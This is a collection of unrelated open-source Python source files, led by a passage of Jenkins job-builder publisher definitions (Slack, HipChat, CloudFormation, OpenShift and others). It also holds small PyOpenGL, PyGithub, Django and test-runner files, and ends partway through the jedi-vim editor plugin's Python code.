valid_upload_types = ['expiring-elements',
'build-log',
'classic']
types = []
upload_element = XML.SubElement(uploader, 'uploads')
uploads = data['uploads']
for upload in uploads:
for upload_type, properties in upload.items():
types.append(upload_type)
if upload_type not in valid_upload_types:
raise InvalidAttributeError('uploads', upload_type,
valid_upload_types)
else:
locals()[upload_type.replace('-', '_')](
properties, upload_element, types)
def flowdock(parser, xml_parent, data):
"""yaml: flowdock
This plugin publishes job build results to a Flowdock flow.
Requires the Jenkins :jenkins-wiki:`Flowdock Plugin
<Flowdock+Plugin>`.
:arg str token: API token for the targeted flow.
(required)
:arg str tags: Comma-separated list of tags to incude in message
(default "")
:arg bool chat-notification: Send chat notification when build fails
(default true)
:arg bool notify-success: Send notification on build success
(default true)
:arg bool notify-failure: Send notification on build failure
(default true)
:arg bool notify-fixed: Send notification when build is fixed
(default true)
:arg bool notify-unstable: Send notification when build is unstable
(default false)
:arg bool notify-aborted: Send notification when build was aborted
(default false)
:arg bool notify-notbuilt: Send notification when build did not occur
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/flowdock001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/flowdock002.yaml
:language: yaml
"""
def gen_notification_entry(data_item, default, text):
e = XML.SubElement(nm, 'entry')
XML.SubElement(e, 'com.flowdock.jenkins.BuildResult').text = text
XML.SubElement(e, 'boolean').text = str(
data.get(data_item, default)).lower()
def gen_setting(item, default):
XML.SubElement(parent, 'notify%s' % item).text = str(
data.get('notify-%s' % item.lower(), default)).lower()
# Raise exception if token was not specified
if 'token' not in data:
raise MissingAttributeError('token')
parent = XML.SubElement(xml_parent,
'com.flowdock.jenkins.FlowdockNotifier')
XML.SubElement(parent, 'flowToken').text = data['token']
XML.SubElement(parent, 'notificationTags').text = data.get('tags', '')
XML.SubElement(parent, 'chatNotification').text = str(
data.get('chat-notification', True)).lower()
nm = XML.SubElement(parent, 'notifyMap')
# notification entries
gen_notification_entry('notify-success', True, 'SUCCESS')
gen_notification_entry('notify-failure', True, 'FAILURE')
gen_notification_entry('notify-fixed', True, 'FIXED')
gen_notification_entry('notify-unstable', False, 'UNSTABLE')
gen_notification_entry('notify-aborted', False, 'ABORTED')
gen_notification_entry('notify-notbuilt', False, 'NOT_BUILT')
# notification settings
gen_setting('Success', True)
gen_setting('Failure', True)
gen_setting('Fixed', True)
gen_setting('Unstable', False)
gen_setting('Aborted', False)
gen_setting('NotBuilt', False)
def clamav(parser, xml_parent, data):
"""yaml: clamav
Check files with ClamAV, an open source antivirus engine.
Requires the Jenkins :jenkins-wiki:`ClamAV Plugin <ClamAV+Plugin>`.
:arg str includes: Files that should be scanned.
(default "")
:arg str excludes: Files that should be ignored.
(default "")
Example:
.. literalinclude:: /../../tests/publishers/fixtures/clamav001.yaml
:language: yaml
"""
clamav = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.clamav.ClamAvRecorder')
XML.SubElement(clamav, 'includes').text = str(
data.get('includes', ''))
XML.SubElement(clamav, 'excludes').text = str(
data.get('excludes', ''))
def testselector(parser, xml_parent, data):
"""yaml: testselector
This plugin allows you to choose specific tests you want to run.
Requires the Jenkins :jenkins-wiki:`Tests Selector Plugin
<Tests+Selector+Plugin>`.
:arg str name: Environment variable in which selected tests are saved
(required)
:arg str description: Description
(default "")
:arg str properties-file: Contain all your tests
(required)
:arg str enable-field: Imply if the test is enabled or not
(default "")
:arg str groupby: Plugin will group the tests by
(default "")
:arg str field-sperator: Separate between the fields in the tests tree
(default "")
:arg str show-fields: Shown in the tests tree
(default "")
:arg str multiplicity-field: Amount of times the test should run
(default "")
Example:
.. literalinclude:: /../../tests/publishers/fixtures/testselector001.yaml
:language: yaml
"""
testselector = XML.SubElement(xml_parent, 'il.ac.technion.jenkins.plugins'
'TestExecuter')
try:
name = str(data['name'])
except KeyError as e:
raise MissingAttributeError(e.args[0])
try:
propertiesfile = str(data['properties-file'])
except KeyError as e:
raise MissingAttributeError(e.args[0])
XML.SubElement(testselector, 'name').text = name
XML.SubElement(testselector, 'description').text = data.get(
'description', '')
XML.SubElement(testselector, 'propertiesFilePath').text = propertiesfile
XML.SubElement(testselector, 'enableField').text = data.get(
'enable-field', '')
XML.SubElement(testselector, 'groupBy').text = data.get(
'groupby', '')
XML.SubElement(testselector, 'fieldSeparator').text = data.get(
'field-separator', '')
XML.SubElement(testselector, 'showFields').text = data.get(
'show-fields', '')
XML.SubElement(testselector, 'multiplicityField').text = data.get(
'multiplicity-field', '')
def cloudformation(parser, xml_parent, data):
"""yaml: cloudformation
Create cloudformation stacks before running a build and optionally
delete them at the end. Requires the Jenkins :jenkins-wiki:`AWS
Cloudformation Plugin <AWS+Cloudformation+Plugin>`.
:arg list create-stacks: List of stacks to create
:create-stacks attributes:
* **arg str name** - The name of the stack (Required)
* **arg str description** - Description of the stack (Optional)
* **arg str recipe** - The cloudformation recipe file (Required)
* **arg list parameters** - A list of key/value pairs, will be
joined together into a comma separated string (Optional)
* **arg int timeout** - Number of seconds to wait before giving up
creating a stack (default 0)
* **arg str access-key** - The Amazon API Access Key (Required)
* **arg str secret-key** - The Amazon API Secret Key (Required)
* **arg int sleep** - Number of seconds to wait before continuing
to the next step (default 0)
* **arg array region** - The region to run cloudformation in.
(Required)
:region values:
* **us-east-1**
* **us-west-1**
* **us-west-2**
* **eu-central-1**
* **eu-west-1**
* **ap-southeast-1**
* **ap-southeast-2**
* **ap-northeast-1**
* **sa-east-1**
:arg list delete-stacks: List of stacks to delete
:delete-stacks attributes:
* **arg list name** - The names of the stacks to delete (Required)
* **arg str access-key** - The Amazon API Access Key (Required)
* **arg str secret-key** - The Amazon API Secret Key (Required)
* **arg bool prefix** - If selected the tear down process will look
for the stack that Starts with the stack name with the oldest
creation date and will delete it. (default false)
* **arg array region** - The region to run cloudformation in.
(Required)
:region values:
* **us-east-1**
* **us-west-1**
* **us-west-2**
* **eu-central-1**
* **eu-west-1**
* **ap-southeast-1**
* **ap-southeast-2**
* **ap-northeast-1**
* **sa-east-1**
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cloudformation.yaml
:language: yaml
"""
region_dict = helpers.cloudformation_region_dict()
stacks = helpers.cloudformation_init(
xml_parent, data, 'CloudFormationPostBuildNotifier')
for stack in data.get('create-stacks', []):
helpers.cloudformation_stack(xml_parent, stack, 'PostBuildStackBean',
stacks, region_dict)
delete_stacks = helpers.cloudformation_init(
xml_parent, data, 'CloudFormationNotifier')
for delete_stack in data.get('delete-stacks', []):
helpers.cloudformation_stack(xml_parent, delete_stack,
'SimpleStackBean', delete_stacks,
region_dict)
def whitesource(parser, xml_parent, data):
"""yaml: whitesource
This plugin brings automatic open source management to Jenkins users.
Requires the Jenkins :jenkins-wiki:`Whitesource Plugin
<Whitesource+Plugin>`.
:arg str product-token: Product name or token to update (default '')
:arg str version: Product version (default '')
:arg str override-token: Override the api token from the global config
(default '')
:arg str project-token: Token uniquely identifying the project to update
(default '')
:arg list includes: list of libraries to include (default '[]')
:arg list excludes: list of libraries to exclude (default '[]')
:arg str policies: Whether to override the global settings. Valid values:
global, enable, disable (default 'global')
:arg str requester-email: Email of the WhiteSource user that requests to
update WhiteSource (>=1.5.1) (default '')
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/whitesource-full.yaml
:language: yaml
Minimal Example:
.. literalinclude::
/../../tests/publishers/fixtures/whitesource-minimal.yaml
:language: yaml
"""
whitesource = XML.SubElement(xml_parent, 'org.whitesource.jenkins.'
'WhiteSourcePublisher')
whitesource.set('plugin', 'whitesource')
policies = ['global', 'enable', 'disable']
mappings = [
('policies', 'jobCheckPolicies', 'global', policies),
('override-token', 'jobApiToken', ''),
('product-token', 'product', ''),
('version', 'productVersion', ''),
('project-token', 'projectToken', ''),
('requester-email', 'requesterEmail', ''),
]
helpers.convert_mapping_to_xml(
whitesource, data, mappings, fail_required=True)
XML.SubElement(whitesource, 'libIncludes').text = ' '.join(
data.get('includes', []))
XML.SubElement(whitesource, 'libExcludes').text = ' '.join(
data.get('excludes', []))
XML.SubElement(whitesource, 'ignorePomModules').text = 'false'
def hipchat(parser, xml_parent, data):
"""yaml: hipchat
Publisher that sends hipchat notifications on job events
Requires the Jenkins :jenkins-wiki:`Hipchat Plugin
<Hipchat+Plugin>` version >=1.9
Please see documentation for older plugin version
http://docs.openstack.org/infra/jenkins-job-builder/hipchat.html
:arg str token: This will override the default auth token (optional)
:arg list rooms: list of HipChat rooms to post messages to, overrides
global default (optional)
:arg bool notify-start: post messages about build start event
(default false)
:arg bool notify-success: post messages about successful build event
(default false)
:arg bool notify-aborted: post messages about aborted build event
(default false)
:arg bool notify-not-built: post messages about build set to NOT_BUILT.
This status code is used in a multi-stage build where a problem in
earlier stage prevented later stages from building. (default false)
:arg bool notify-unstable: post messages about unstable build event
(default false)
:arg bool notify-failure: post messages about build failure event
(default false)
:arg bool notify-back-to-normal: post messages about build being back to
normal after being unstable or failed (default false)
:arg str start-message: This will override the default start message
(optional)
:arg str complete-message: This will override the default complete message
(optional)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/hipchat001.yaml
:language: yaml
"""
hipchat = XML.SubElement(
xml_parent,
'jenkins.plugins.hipchat.HipChatNotifier')
XML.SubElement(hipchat, 'token').text = str(
data.get('token', ''))
if 'rooms' in data:
XML.SubElement(hipchat, 'room').text = str(
",".join(data['rooms']))
XML.SubElement(hipchat, 'startNotification').text = str(
data.get('notify-start', False)).lower()
XML.SubElement(hipchat, 'notifySuccess').text = str(
data.get('notify-success', False)).lower()
XML.SubElement(hipchat, 'notifyAborted').text = str(
data.get('notify-aborted', False)).lower()
XML.SubElement(hipchat, 'notifyNotBuilt').text = str(
data.get('notify-not-built', False)).lower()
XML.SubElement(hipchat, 'notifyUnstable').text = str(
data.get('notify-unstable', False)).lower()
XML.SubElement(hipchat, 'notifyFailure').text = str(
data.get('notify-failure', False)).lower()
XML.SubElement(hipchat, 'notifyBackToNormal').text = str(
data.get('notify-back-to-normal', False)).lower()
# optional settings, so only add XML in if set.
if 'start-message' in data:
XML.SubElement(hipchat, 'startJobMessage').text = str(
data['start-message'])
if 'complete-message' in data:
XML.SubElement(hipchat, 'completeJobMessage').text = str(
data['complete-message'])
def slack(parser, xml_parent, data):
"""yaml: slack
Publisher that sends slack notifications on job events.
Requires the Jenkins :jenkins-wiki:`Slack Plugin <Slack+Plugin>`
When using Slack Plugin version < 2.0, Slack Plugin itself requires a
publisher aswell as properties please note that you have to create those
too. When using Slack Plugin version >= 2.0, you should only configure the
publisher.
:arg str team-domain: Your team's domain at slack. (default '')
:arg str auth-token: The integration token to be used when sending
notifications. (default '')
:arg str build-server-url: Specify the URL for your server installation.
(default '/')
:arg str room: A comma seperated list of rooms / channels to post the
notifications to. (default '')
:arg bool notify-start: Send notification when the job starts (>=2.0).
(default false)
:arg bool notify-success: Send notification on success (>=2.0).
(default false)
:arg bool notify-aborted: Send notification when job is aborted (>=2.0).
(default false)
:arg bool notify-not-built: Send notification when job set to NOT_BUILT
status (>=2.0). (default false)
:arg bool notify-unstable: Send notification when job becomes unstable
(>=2.0). (default false)
:arg bool notify-failure: Send notification when job fails for the first
time (previous build was a success) (>=2.0). (default false)
:arg bool notifiy-back-to-normal: Send notification when job is succeeding
again after being unstable or failed (>=2.0). (default false)
:arg bool notify-repeated-failure: Send notification when job fails
successively (previous build was also a failure) (>=2.0).
(default false)
:arg bool include-test-summary: Include the test summary (>=2.0).
(default false)
:arg str commit-info-choice: What commit information to include into
notification message, "NONE" includes nothing about commits, "AUTHORS"
includes commit list with authors only, and "AUTHORS_AND_TITLES"
includes commit list with authors and titles (>=2.0). (default "NONE")
:arg bool include-custom-message: Include a custom message into the
notification (>=2.0). (default false)
:arg str custom-message: Custom message to be included (>=2.0).
(default '')
Example (version < 2.0):
.. literalinclude::
/../../tests/publishers/fixtures/slack001.yaml
:language: yaml
Minimal example (version >= 2.0):
.. literalinclude::
/../../tests/publishers/fixtures/slack003.yaml
:language: yaml
Full example (version >= 2.0):
.. literalinclude::
/../../tests/publishers/fixtures/slack004.yaml
:language: yaml
"""
def _add_xml(elem, name, value=''):
if isinstance(value, bool):
value = str(value).lower()
XML.SubElement(elem, name).text = value
logger = logging.getLogger(__name__)
plugin_info = parser.registry.get_plugin_info('Slack Notification Plugin')
plugin_ver = pkg_resources.parse_version(plugin_info.get('version', "0"))
mapping = (
('team-domain', 'teamDomain', ''),
('auth-token', 'authToken', ''),
('build-server-url', 'buildServerUrl', '/'),
('room', 'room', ''),
)
mapping_20 = (
('notify-start', 'startNotification', False),
('notify-success', 'notifySuccess', False),
('notify-aborted', 'notifyAborted', False),
('notify-not-built', 'notifyNotBuilt', False),
('notify-unstable', 'notifyUnstable', False),
('notify-failure', 'notifyFailure', False),
('notify-back-to-normal', 'notifyBackToNormal', False),
('notify-repeated-failure', 'notifyRepeatedFailure', False),
('include-test-summary', 'includeTestSummary', False),
('commit-info-choice', 'commitInfoChoice', 'NONE'),
('include-custom-message', 'includeCustomMessage', False),
('custom-message', 'customMessage', ''),
)
commit_info_choices = ['NONE', 'AUTHORS', 'AUTHORS_AND_TITLES']
slack = XML.SubElement(
xml_parent,
'jenkins.plugins.slack.SlackNotifier',
)
if plugin_ver >= pkg_resources.parse_version("2.0"):
mapping = mapping + mapping_20
if plugin_ver < pkg_resources.parse_version("2.0"):
for yaml_name, _, default_value in mapping:
# All arguments that don't have a default value are mandatory for
# the plugin to work as intended.
if not data.get(yaml_name, default_value):
raise MissingAttributeError(yaml_name)
for yaml_name, _, _ in mapping_20:
if yaml_name in data:
logger.warn(
"'%s' is invalid with plugin version < 2.0, ignored",
yaml_name,
)
for yaml_name, xml_name, default_value in mapping:
value = data.get(yaml_name, default_value)
# 'commit-info-choice' is enumerated type
if yaml_name == 'commit-info-choice':
if value not in commit_info_choices:
raise InvalidAttributeError(
yaml_name, value, commit_info_choices,
)
# Ensure that custom-message is set when include-custom-message is set
# to true.
if yaml_name == 'include-custom-message' and data is False:
if not data.get('custom-message', ''):
raise MissingAttributeError('custom-message')
_add_xml(slack, xml_name, value)
def phabricator(parser, xml_parent, data):
"""yaml: phabricator
Integrate with `Phabricator <http://phabricator.org/>`_
Requires the Jenkins :jenkins-wiki:`Phabricator Plugin
<Phabricator+Differential+Plugin>`.
:arg bool comment-on-success: Post a *comment* when the build
succeeds. (optional)
:arg bool uberalls-enabled: Integrate with uberalls. (optional)
:arg str comment-file: Include contents of given file if
commenting is enabled. (optional)
:arg int comment-size: Maximum comment character length. (optional)
:arg bool comment-with-console-link-on-failure: Post a *comment*
when the build fails. (optional)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/phabricator001.yaml
:language: yaml
"""
root = XML.SubElement(xml_parent,
'com.uber.jenkins.phabricator.PhabricatorNotifier')
if 'comment-on-success' in data:
XML.SubElement(root, 'commentOnSuccess').text = str(
data.get('comment-on-success')).lower()
if 'uberalls-enabled' in data:
XML.SubElement(root, 'uberallsEnabled').text = str(
data.get('uberalls-enabled')).lower()
if 'comment-file' in data:
XML.SubElement(root, 'commentFile').text = data.get('comment-file')
if 'comment-size' in data:
XML.SubElement(root, 'commentSize').text = str(
data.get('comment-size'))
if 'comment-with-console-link-on-failure' in data:
XML.SubElement(root, 'commentWithConsoleLinkOnFailure').text = str(
data.get('comment-with-console-link-on-failure')).lower()
def openshift_build_canceller(parser, xml_parent, data):
"""yaml: openshift-build-canceller
This action is intended to provide cleanup for a Jenkins job which failed
because a build is hung (instead of terminating with a failure code);
this step will allow you to perform the equivalent of a oc cancel-build
for the provided build config; any builds under that build config which
are not previously terminated (either successfully or unsuccessfully)
or cancelled will be cancelled.
Requires the Jenkins :jenkins-wiki:`OpenShift
Pipeline Plugin <OpenShift+Pipeline+Plugin>`.
:arg str api-url: this would be the value you specify if you leverage the
--server option on the OpenShift `oc` command.
(default '\https://openshift.default.svc.cluster.local')
:arg str bld-cfg: The value here should be whatever was the output
form `oc project` when you created the BuildConfig you
want to run a Build on (default 'frontend')
:arg str namespace: If you run `oc get bc` for the project listed in
"namespace", that is the value you want to put here. (default 'test')
:arg str auth-token: The value here is what you supply with the --token
option when invoking the OpenShift `oc` command. (default '')
:arg bool verbose: This flag is the toggle for
turning on or off detailed logging in this plug-in. (default false)
Full Example:
.. literalinclude::
../../tests/publishers/fixtures/openshift-build-canceller001.yaml
:language: yaml
Minimal Example:
.. literalinclude::
../../tests/publishers/fixtures/openshift-build-canceller002.yaml
:language: yaml
"""
osb = XML.SubElement(xml_parent,
'com.openshift.jenkins.plugins.pipeline.'
'OpenShiftBuildCanceller')
mapping = [
# option, xml name, default value
("api-url", 'apiURL', 'https://openshift.default.svc.cluster.local'),
("bld-cfg", 'bldCfg', 'frontend'),
("namespace", 'namespace', 'test'),
("auth-token", 'authToken', ''),
("verbose", 'verbose', False),
]
helpers.convert_mapping_to_xml(osb, data, mapping, fail_required=True)
def openshift_deploy_canceller(parser, xml_parent, data):
"""yaml: openshift-deploy-canceller
This action is intended to provide cleanup for any OpenShift deployments
left running when the Job completes; this step will allow you to perform
the equivalent of a oc deploy --cancel for the provided deployment config.
Requires the Jenkins :jenkins-wiki:`OpenShift
Pipeline Plugin <OpenShift+Pipeline+Plugin>`.
:arg str api-url: this would be the value you specify if you leverage the
--server option on the OpenShift `oc` command.
(default '\https://openshift.default.svc.cluster.local')
:arg str dep-cfg: The value here should be whatever was the output
form `oc project` when you created the BuildConfig you want to run a
Build on (default frontend)
:arg str namespace: If you run `oc get bc` for the project listed in
"namespace", that is the value you want to put here. (default 'test')
:arg str auth-token: The value here is what you supply with the --token
option when invoking the OpenShift `oc` command. (default '')
:arg bool verbose: This flag is the toggle for
turning on or off detailed logging in this plug-in. (default false)
Full Example:
.. literalinclude::
../../tests/publishers/fixtures/openshift-deploy-canceller001.yaml
:language: yaml
Minimal Example:
.. literalinclude::
../../tests/publishers/fixtures/openshift-deploy-canceller002.yaml
:language: yaml
"""
osb = XML.SubElement(xml_parent,
'com.openshift.jenkins.plugins.pipeline.'
'OpenShiftDeployCanceller')
mapping = [
# option, xml name, default value
("api-url", 'apiURL', 'https://openshift.default.svc.cluster.local'),
("dep-cfg", 'depCfg', 'frontend'),
("namespace", 'namespace', 'test'),
("auth-token", 'authToken', ''),
("verbose", 'verbose', False),
]
helpers.convert_mapping_to_xml(osb, data, mapping, fail_required=True)
def github_pull_request_merge(parser, xml_parent, data):
"""yaml: github-pull-request-merge
This action merges the pull request that triggered the build (see the
github pull request trigger)
Requires the Jenkins :jenkins-wiki:`GitHub pull request builder plugin
<GitHub+pull+request+builder+plugin>`.
:arg bool only-admins-merge: if `true` only administrators can merge the
pull request, (default false)
:arg bool disallow-own-code: if `true` will allow merging your own pull
requests, in opposite to needing someone else to trigger the merge.
(default false)
:arg str merge-comment: Comment to set on the merge commit (default '')
:arg bool fail-on-non-merge: fail the job if the merge was unsuccessful
(default false)
:arg bool delete-on-merge: Delete the branch of the pull request on
successful merge (default false)
Full Example:
.. literalinclude::
../../tests/publishers/fixtures/github-pull-request-merge001.yaml
:language: yaml
Minimal Example:
.. literalinclude::
../../tests/publishers/fixtures/github-pull-request-merge002.yaml
:language: yaml
"""
osb = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.ghprb.GhprbPullRequestMerge')
mapping = [
# option, xml name, default value
("only-admins-merge", 'onlyAdminsMerge', 'false'),
("disallow-own-code", 'disallowOwnCode', 'false'),
("merge-comment", 'mergeComment', ''),
("fail-on-non-merge", 'failOnNonMerge', 'false'),
("delete-on-merge", 'deleteOnMerge', 'false'),
]
helpers.convert_mapping_to_xml(osb, data, mapping, fail_required=True)
class Publishers(jenkins_jobs.modules.base.Base):
sequence = 70
component_type = 'publisher'
component_list_type = 'publishers'
def gen_xml(self, parser, xml_parent, data):
publishers = XML.SubElement(xml_parent, 'publishers')
for action in data.get('publishers', []):
self.registry.dispatch('publisher', parser, publishers, action)
|
mwmuni/LIGGGHTS_GUI
|
refs/heads/master
|
OpenGL/raw/GLX/EXT/framebuffer_sRGB.py
|
8
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLX import _types as _cs
# End users want this...
from OpenGL.raw.GLX._types import *
from OpenGL.raw.GLX import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLX_EXT_framebuffer_sRGB'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLX,'GLX_EXT_framebuffer_sRGB',error_checker=_errors._error_checker)
GLX_FRAMEBUFFER_SRGB_CAPABLE_EXT=_C('GLX_FRAMEBUFFER_SRGB_CAPABLE_EXT',0x20B2)
|
sharkykh/SickRage
|
refs/heads/develop
|
lib/github/InputGitAuthor.py
|
10
|
# -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <[email protected]> #
# Copyright 2012 Zearin <[email protected]> #
# Copyright 2013 Vincent Jacques <[email protected]> #
# #
# This file is part of PyGithub. #
# http://pygithub.github.io/PyGithub/v1/index.html #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
class InputGitAuthor(object):
"""
"""
def __init__(self, name, email, date=github.GithubObject.NotSet):
"""
:param name: string
:param email: string
:param date: string
"""
assert isinstance(name, (str, unicode)), name
assert isinstance(email, (str, unicode)), email
assert date is github.GithubObject.NotSet or isinstance(date, (str, unicode)), date # @todo Datetime?
self.__name = name
self.__email = email
self.__date = date
def __repr__(self):
return 'InputGitAuthor(name="{}")'.format(self.__name)
@property
def _identity(self):
identity = {
"name": self.__name,
"email": self.__email,
}
if self.__date is not github.GithubObject.NotSet:
identity["date"] = self.__date
return identity
|
henryfjordan/django
|
refs/heads/master
|
tests/template_backends/apps/good/templatetags/good_tags.py
|
1426
|
from django.template import Library
register = Library()
|
zhmocean/mongo-web-shell
|
refs/heads/master
|
run_tests.py
|
4
|
# Copyright 2013 10gen Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nose
if __name__ == '__main__':
result = nose.runmodule(name='tests', argv=[
'', '-s', '--verbose', '--logging-level=INFO', '--rednose', ])
|
chrber/dcache-docker
|
refs/heads/master
|
dcache/deps/.vim/bundle/jedi-vim/jedi_vim.py
|
5
|
"""
The Python parts of the Jedi library for VIM. It is mostly about communicating
with VIM.
"""
import traceback # for exception output
import re
import os
import sys
from shlex import split as shsplit
try:
from itertools import zip_longest
except ImportError:
from itertools import izip_longest as zip_longest # Python 2
is_py3 = sys.version_info[0] >= 3
if is_py3:
unicode = str
class PythonToVimStr(unicode):
""" Vim has a different string implementation of single quotes """
__slots__ = []
def __new__(cls, obj, encoding='UTF-8'):
if is_py3 or isinstance(obj, unicode):
return unicode.__new__(cls, obj)
else:
return unicode.__new__(cls, obj, encoding)
def __repr__(self):
# this is totally stupid and makes no sense but vim/python unicode
# support is pretty bad. don't ask how I came up with this... It just
# works...
# It seems to be related to that bug: http://bugs.python.org/issue5876
if unicode is str:
s = self
else:
s = self.encode('UTF-8')
return '"%s"' % s.replace('\\', '\\\\').replace('"', r'\"')
class VimError(Exception):
def __init__(self, message, throwpoint, executing):
super(type(self), self).__init__(message)
self.message = message
self.throwpoint = throwpoint
self.executing = executing
def __str__(self):
return self.message + '; created by: ' + repr(self.executing)
def _catch_exception(string, is_eval):
"""
Interface between vim and python calls back to it.
Necessary, because the exact error message is not given by `vim.error`.
"""
e = 'jedi#_vim_exceptions(%s, %s)'
result = vim.eval(e % (repr(PythonToVimStr(string, 'UTF-8')), is_eval))
if 'exception' in result:
raise VimError(result['exception'], result['throwpoint'], string)
return result['result']
def vim_command(string):
_catch_exception(string, 0)
def vim_eval(string):
return _catch_exception(string, 1)
def no_jedi_warning(error=None):
msg = "Please install Jedi if you want to use jedi-vim."
if error:
msg = '{} The error was: {}'.format(msg, error)
vim.command('echohl WarningMsg'
'| echom "Please install Jedi if you want to use jedi-vim."'
'| echohl None')
def echo_highlight(msg):
vim_command('echohl WarningMsg | echom "{}" | echohl None'.format(
msg.replace('"', '\\"')))
import vim
try:
import jedi
except ImportError as e:
no_jedi_warning(str(e))
jedi = None
else:
try:
version = jedi.__version__
except Exception as e: # e.g. AttributeError
echo_highlight("Could not load jedi python module: {}".format(e))
jedi = None
else:
if isinstance(version, str):
# the normal use case, now.
from jedi import utils
version = utils.version_info()
if version < (0, 7):
echo_highlight('Please update your Jedi version, it is too old.')
def catch_and_print_exceptions(func):
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except (Exception, vim.error):
print(traceback.format_exc())
return None
return wrapper
def _check_jedi_availability(show_error=False):
def func_receiver(func):
def wrapper(*args, **kwargs):
if jedi is None:
if show_error:
no_jedi_warning()
return
else:
return func(*args, **kwargs)
return wrapper
return func_receiver
@catch_and_print_exceptions
def get_script(source=None, column=None):
jedi.settings.additional_dynamic_modules = \
[b.name for b in vim.buffers if b.name is not None and b.name.endswith('.py')]
if source is None:
source = '\n'.join(vim.current.buffer)
row = vim.current.window.cursor[0]
if column is None:
column = vim.current.window.cursor[1]
buf_path = vim.current.buffer.name
encoding = vim_eval('&encoding') or 'latin1'
return jedi.Script(source, row, column, buf_path, encoding)
@_check_jedi_availability(show_error=False)
@catch_and_print_exceptions
def completions():
row, column = vim.current.window.cursor
# Clear call signatures in the buffer so they aren't seen by the completer.
# Call signatures in the command line can stay.
if vim_eval("g:jedi#show_call_signatures") == '1':
clear_call_signatures()
if vim.eval('a:findstart') == '1':
count = 0
for char in reversed(vim.current.line[:column]):
if not re.match('[\w\d]', char):
break
count += 1
vim.command('return %i' % (column - count))
else:
base = vim.eval('a:base')
source = ''
for i, line in enumerate(vim.current.buffer):
# enter this path again, otherwise source would be incomplete
if i == row - 1:
source += line[:column] + base + line[column:]
else:
source += line
source += '\n'
# here again hacks, because jedi has a different interface than vim
column += len(base)
try:
script = get_script(source=source, column=column)
completions = script.completions()
signatures = script.call_signatures()
out = []
for c in completions:
d = dict(word=PythonToVimStr(c.name[:len(base)] + c.complete),
abbr=PythonToVimStr(c.name),
# stuff directly behind the completion
menu=PythonToVimStr(c.description),
info=PythonToVimStr(c.docstring()), # docstr
icase=1, # case insensitive
dup=1 # allow duplicates (maybe later remove this)
)
out.append(d)
strout = str(out)
except Exception:
# print to stdout, will be in :messages
print(traceback.format_exc())
strout = ''
completions = []
signatures = []
show_call_signatures(signatures)
vim.command('return ' + strout)
@_check_jedi_availability(show_error=True)
@catch_and_print_exceptions
def goto(mode="goto", no_output=False):
"""
:param str mode: "related_name", "definition", "assignment", "auto"
:return: list of definitions/assignments
:rtype: list
"""
script = get_script()
try:
if mode == "goto":
definitions = [x for x in script.goto_definitions()
if not x.in_builtin_module()]
if not definitions:
definitions = script.goto_assignments()
elif mode == "related_name":
definitions = script.usages()
elif mode == "definition":
definitions = script.goto_definitions()
elif mode == "assignment":
definitions = script.goto_assignments()
except jedi.NotFoundError:
echo_highlight("Cannot follow nothing. Put your cursor on a valid name.")
definitions = []
else:
if no_output:
return definitions
if not definitions:
echo_highlight("Couldn't find any definitions for this.")
elif len(definitions) == 1 and mode != "related_name":
# just add some mark to add the current position to the jumplist.
# this is ugly, because it overrides the mark for '`', so if anyone
# has a better idea, let me know.
vim_command('normal! m`')
d = list(definitions)[0]
if d.in_builtin_module():
if d.is_keyword:
echo_highlight("Cannot get the definition of Python keywords.")
else:
echo_highlight("Builtin modules cannot be displayed (%s)."
% d.desc_with_module)
else:
if d.module_path != vim.current.buffer.name:
result = new_buffer(d.module_path)
if not result:
return []
vim.current.window.cursor = d.line, d.column
else:
# multiple solutions
lst = []
for d in definitions:
if d.in_builtin_module():
lst.append(dict(text=PythonToVimStr('Builtin ' + d.description)))
else:
lst.append(dict(filename=PythonToVimStr(d.module_path),
lnum=d.line, col=d.column + 1,
text=PythonToVimStr(d.description)))
vim_eval('setqflist(%s)' % repr(lst))
vim_eval('jedi#add_goto_window(' + str(len(lst)) + ')')
return definitions
@_check_jedi_availability(show_error=True)
@catch_and_print_exceptions
def show_documentation():
script = get_script()
try:
definitions = script.goto_definitions()
except jedi.NotFoundError:
definitions = []
except Exception:
# print to stdout, will be in :messages
definitions = []
print("Exception, this shouldn't happen.")
print(traceback.format_exc())
if not definitions:
echo_highlight('No documentation found for that.')
vim.command('return')
else:
docs = ['Docstring for %s\n%s\n%s' % (d.desc_with_module, '=' * 40, d.docstring())
if d.docstring() else '|No Docstring for %s|' % d for d in definitions]
text = ('\n' + '-' * 79 + '\n').join(docs)
vim.command('let l:doc = %s' % repr(PythonToVimStr(text)))
vim.command('let l:doc_lines = %s' % len(text.split('\n')))
return True
@catch_and_print_exceptions
def clear_call_signatures():
# Check if using command line call signatures
if vim_eval("g:jedi#show_call_signatures") == '2':
vim_command('echo ""')
return
cursor = vim.current.window.cursor
e = vim_eval('g:jedi#call_signature_escape')
# We need two turns here to search and replace certain lines:
# 1. Search for a line with a call signature and save the appended
# characters
